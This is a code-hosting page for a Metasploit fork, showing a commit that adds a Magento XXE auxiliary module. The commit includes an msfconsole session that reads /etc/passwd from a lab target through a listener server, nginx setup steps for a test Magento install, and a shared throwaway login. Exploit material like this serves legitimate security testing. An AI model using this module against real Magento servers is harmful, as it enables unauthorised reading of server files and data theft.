adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
ec6540b806a0d441e9e071bc7dca432bcde8b0be
metasploit-gs/modules
T
History
jvoisin ec6540b806 Add a module for the recent magento XXE 
```
jvoisin@kaa 16:10 /opt/msf ./msfconsole

 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

       =[ metasploit v4.11.5-dev-9a0f0a7                  ]
+ -- --=[ 1505 exploits - 867 auxiliary - 251 post        ]
+ -- --=[ 434 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use auxiliary/gather/magento_xxe
msf auxiliary(magento_xxe) > set RPORT 8080
RPORT => 8080
msf auxiliary(magento_xxe) > set SRVHOST 192.168.1.11
SRVHOST => 192.168.1.11
msf auxiliary(magento_xxe) > setg RHOST 192.168.1.25
RHOST => 192.168.1.25
msf auxiliary(magento_xxe) > show options

Module options (auxiliary/gather/magento_xxe):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILEPATH   /etc/passwd      yes       The filepath to read on the server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.25     yes       The target address
   RPORT      8080             yes       The target port
   SRVHOST    192.168.1.11     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base Magento directory path
   URIPATH    fetch.php        yes       The URI path to use for this exploit to get the data back
   VHOST                       no        HTTP server virtual host

msf auxiliary(magento_xxe) > run

[*] Using URL: http://192.168.1.11:8080/fetch.php
[*] Server started.
[*] 192.168.1.25     magento_xxe - Got an answer from the server.
[+] 192.168.1.25     magento_xxe - File /etc/passwd found and saved to path: /home/jvoisin/.msf4/loot/20151113163706_default_192.168.1.25_magento.file_415167.txt
[*] Server stopped.
[*] Auxiliary module execution completed
```

1. [ ] Get the "Community Edition" of magento on [its website]( https://www.magentocommerce.com/download ) (Feel free to use bugmenot@mailinator.com/Password1 to log in)
2. [ ] Install nginx and php-fpm. This is the configuration that I used:
```
server {
    listen 0.0.0.0:8080  default;
    listen 192.168.1.25:8080;
    server_name _;
    root /var/www2/;
    index index.php;

    location = /js/index.php/x.js { rewrite ^(.*\.php)/ $1 last; }

    location / { try_files $uri $uri/ @rewrite; }
    location @rewrite { rewrite / /index.php?$args; }
    location ~ \.php$ {
	try_files $uri =404;
	fastcgi_pass unix:/var/run/php5-fpm.sock;
	fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
	include fastcgi_params;
    }
}
```

3. [ ] Launch metasploit, `use auxiliary/gather/magento_xxe`, set
options
4. [ ] Get your file exfiltrated in your loot.

1. The XML is hand-crafted because I don't know how to Nokogiri
2. I'm quite sure that the `service.stop` in the `primer` function is
wrong. What is the regular way to handle this?
2015-11-13 16:40:04 +01:00
..
auxiliary
Add a module for the recent magento XXE
2015-11-13 16:40:04 +01:00
encoders
Land #5510, update x86/alpha* encoders to be SaveRegister aware
2015-10-01 15:07:10 -05:00
exploits
Land #6142, uptime refactor
2015-11-12 16:58:55 -06:00
nops
Use each_char
2015-08-17 11:08:40 -05:00
payloads
update payload size cache
2015-10-30 17:35:05 -05:00
post
Resolve 'duplicate key warning' for some modules
2015-11-09 18:40:32 -08:00